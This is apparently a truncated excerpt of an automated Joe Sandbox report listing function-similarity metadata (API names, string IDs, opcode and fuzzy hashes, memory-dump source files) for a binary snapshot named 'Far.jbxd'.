                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                      • Opcode ID: d41dff1efbe5f0cd7985acd07f36eb91ce587f9c76dfd0e4915369b3380bc83a
                                                                                                                                                                      • Instruction ID: 5d5853f4efb78e62afebb2b099d4170a7be14e618ec92f0e9c630271e345c1df
                                                                                                                                                                      • Opcode Fuzzy Hash: d41dff1efbe5f0cd7985acd07f36eb91ce587f9c76dfd0e4915369b3380bc83a
                                                                                                                                                                      • Instruction Fuzzy Hash: 59113A36608B5196E710AF92E84055DB7B8FB88F80B994536DF9947B14EF38E815C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                      • Opcode ID: 833b7568b164686ca59d3f4ccdf409992e5fbf16589a9e1f7bd0406267d2b037
                                                                                                                                                                      • Instruction ID: 6a93c56e48d1ffa7f24416436f21d703bd4c5a82042997ccefc20613e13bf801
                                                                                                                                                                      • Opcode Fuzzy Hash: 833b7568b164686ca59d3f4ccdf409992e5fbf16589a9e1f7bd0406267d2b037
                                                                                                                                                                      • Instruction Fuzzy Hash: C811CC22A0C94A91EB21BBB4E4547BDA360FF84F44FD48035CA8D47298EFBDD489D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                      • API String ID: 948891078-24824748
                                                                                                                                                                      • Opcode ID: e3c816f570cbd0ec0d6eb376bd4c1e2c4743be2329f5d15e00cad217cd143534
                                                                                                                                                                      • Instruction ID: 7430fb601c1519582629906985bd1a49e7a9be725accc27fb8fc4d6cf70504b5
                                                                                                                                                                      • Opcode Fuzzy Hash: e3c816f570cbd0ec0d6eb376bd4c1e2c4743be2329f5d15e00cad217cd143534
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BD1E56271CA5AA1EB10EBA6D4946ADAB70FB80F84F805031EE4E47B65FF3CD405DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: $*
                                                                                                                                                                      • API String ID: 3215553584-3982473090
                                                                                                                                                                      • Opcode ID: c055e2a7898669bbbe43ab947f78cdc000531ae5bf8c58aeb1286c74639529ea
                                                                                                                                                                      • Instruction ID: df1f52ff59cb29f85bb3b4d1a1509fd9f4179e6bde890984825a07385e1c4361
                                                                                                                                                                      • Opcode Fuzzy Hash: c055e2a7898669bbbe43ab947f78cdc000531ae5bf8c58aeb1286c74639529ea
                                                                                                                                                                      • Instruction Fuzzy Hash: DE618AB2A0D24A9AF76AAEF4C05437CB7A0EB05F08F941135C64E422D9EF6CD441E731
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                      • Opcode ID: 6380ddbfdd342884776b23bf1dce6471886363c6786550ee911b86bdb9c54e4e
                                                                                                                                                                      • Instruction ID: c4e7938a41898dd2d523374b4d1438210fbfda14e9fa2af6f8cff4a3b7bb66f5
                                                                                                                                                                      • Opcode Fuzzy Hash: 6380ddbfdd342884776b23bf1dce6471886363c6786550ee911b86bdb9c54e4e
                                                                                                                                                                      • Instruction Fuzzy Hash: D351AF3361C685A6EB10EB91E4806AEFB60FB88B84F850035FE4D57B49EB7CD505CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                      • API String ID: 2671490118-1439706946
                                                                                                                                                                      • Opcode ID: 19626ad3cce646eb8808af0153a0a32d7f15e4a3f84b6a2de6a8db8986ef7ed6
                                                                                                                                                                      • Instruction ID: b6435408bc65223c7304c48e252966a8ab51aaf742225ab6017f0f4a49a1b3c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 19626ad3cce646eb8808af0153a0a32d7f15e4a3f84b6a2de6a8db8986ef7ed6
                                                                                                                                                                      • Instruction Fuzzy Hash: 36417D3260C6C696E770DF65E044BAAF7A0F788790F904225EA9903A99EF3CD4858F40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                      • API String ID: 2507767853-685833217
                                                                                                                                                                      • Opcode ID: a383e85b43ea32882848ee4f2e9b3553474e12a60368ba4d4d3540b5252c881f
                                                                                                                                                                      • Instruction ID: be308472ae2d4de360f7ea5228ec194c8de8aa258d529410296c06d8a23c9135
                                                                                                                                                                      • Opcode Fuzzy Hash: a383e85b43ea32882848ee4f2e9b3553474e12a60368ba4d4d3540b5252c881f
                                                                                                                                                                      • Instruction Fuzzy Hash: F8318C7660CB8AA1DB10EB56E4801AEB7A5FB89FC0F804031EA8D47B55EF38D595DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF73D0A1B29), ref: 00007FF73D0DC063
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF73D0A1B29), ref: 00007FF73D0DC07B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                      • Opcode ID: d27fffff7f0a7ce1b3cfb5a4357f2220952fc30aec9119313a0d15093bed926b
                                                                                                                                                                      • Instruction ID: 9f29ce295edeed93a678034f082fa217b4d18c37442fee80f817abd151d7f561
                                                                                                                                                                      • Opcode Fuzzy Hash: d27fffff7f0a7ce1b3cfb5a4357f2220952fc30aec9119313a0d15093bed926b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF01C22A0AB0AE2EF18EBA0E85436863A4EF08F48FD40435C91D06354FF7CD5A9D321
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                                                                      • Opcode ID: f21c76d23a038c2316ade562fac3490fda754206bc4d8fa7a083c3a4e98f6d8a
                                                                                                                                                                      • Instruction ID: 6f35709c5db79adfb4471dd1f3d4cfaf045d4df9142696ee2ec585499a42fabd
                                                                                                                                                                      • Opcode Fuzzy Hash: f21c76d23a038c2316ade562fac3490fda754206bc4d8fa7a083c3a4e98f6d8a
                                                                                                                                                                      • Instruction Fuzzy Hash: 06E06D6190EF0AA2EF05EBA1E8643A863A4FB18F44FD40431CD1C05350FF7CD5A99320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                                                                      • Opcode ID: acd268520b77820f179ff0a4fbc63ba1ee1374a64cad2f0639ba0e86ca3a8f91
                                                                                                                                                                      • Instruction ID: 51eebeb01408a40959b189e18f97145e98e7c7833ad02f61f87cd032405de5c6
                                                                                                                                                                      • Opcode Fuzzy Hash: acd268520b77820f179ff0a4fbc63ba1ee1374a64cad2f0639ba0e86ca3a8f91
                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE0ED61D0EB0A92EF18EBA1E4543A8E3A4FB08F44FE40434C91D45354FFBCD5A99350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2000298826-0
                                                                                                                                                                      • Opcode ID: eb20ef8fc96f0e1a697fecaca7efa7f244b3ca2bba3fbe5825ed712c483caec6
                                                                                                                                                                      • Instruction ID: 12ee8e94dae9d9cd515d2f9b4e4b175f2512757364d9220acb28c6d661067bc6
                                                                                                                                                                      • Opcode Fuzzy Hash: eb20ef8fc96f0e1a697fecaca7efa7f244b3ca2bba3fbe5825ed712c483caec6
                                                                                                                                                                      • Instruction Fuzzy Hash: C2718032A18A8996E700EB65D4547AEB7B0FB88F84F804132EE4D07755EF7CD505CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3076010158-0
                                                                                                                                                                      • Opcode ID: 49acf40c1f31e8577476818a3c4e039a801d175d47a5432b0057eb6981bce290
                                                                                                                                                                      • Instruction ID: 158e0e775685b220c70a51d3174625ca88997ca4a5126d49252d78ae54ba0eb9
                                                                                                                                                                      • Opcode Fuzzy Hash: 49acf40c1f31e8577476818a3c4e039a801d175d47a5432b0057eb6981bce290
                                                                                                                                                                      • Instruction Fuzzy Hash: B2417B36A09A4EA6EB20DFA2D4801AD77A4FB48F84FA54036DF0D13754EF38D895D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                      • Opcode ID: 2fe28cef72f3193f0c915b36ef301bdbf2fe836125e117d31ecaa524a2d355ee
                                                                                                                                                                      • Instruction ID: 130edf4dea9d51c91c52ddbab1352eced30ffc1031af5d0fed353911ed2d1070
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fe28cef72f3193f0c915b36ef301bdbf2fe836125e117d31ecaa524a2d355ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 234109A1A0CA8A61F770AB65B4507B9ABA0FB44F50F940131DADE036E5EF3DD481E760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3340791633-0
                                                                                                                                                                      • Opcode ID: f5b4a7c729c4b1aec2e0108388987a03468645911b79672191becdef22c2c1a8
                                                                                                                                                                      • Instruction ID: fcc255f234d2ab1d1efa54ce5b133120af5a0bc21fa542e21909b7823fa1c1cd
                                                                                                                                                                      • Opcode Fuzzy Hash: f5b4a7c729c4b1aec2e0108388987a03468645911b79672191becdef22c2c1a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 42418021E0C94EA6FB64AB95D5403B8A761EB88F50F984032D66D036D1EF2CE881E330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                      • Opcode ID: bddc8ba87bb65f7360b587b740d3350a56d94a9e00a351e3cc21f9116beaa976
                                                                                                                                                                      • Instruction ID: f2130f760e905cd062040e18c0590b992170607a96ed2785c7743cee30c0c367
                                                                                                                                                                      • Opcode Fuzzy Hash: bddc8ba87bb65f7360b587b740d3350a56d94a9e00a351e3cc21f9116beaa976
                                                                                                                                                                      • Instruction Fuzzy Hash: FD312661A0C68A61EB30ABA1A4407FDABA4FB44F90F950131DADD037D1EF3CD581E360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                      • Opcode ID: 4108aa29eab34c2bb8b8229e6a06b591e92f45f67e7e4b05de5598b4c6381578
                                                                                                                                                                      • Instruction ID: 44fcf674705d3184ce1b4b824af3f886ac43da099893edc04e33c02782dc057b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4108aa29eab34c2bb8b8229e6a06b591e92f45f67e7e4b05de5598b4c6381578
                                                                                                                                                                      • Instruction Fuzzy Hash: BC21F561B0CA5A92EB14BB67E45427DA7A4EFC9FD0F944030EE8E83392EF2CD4419750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
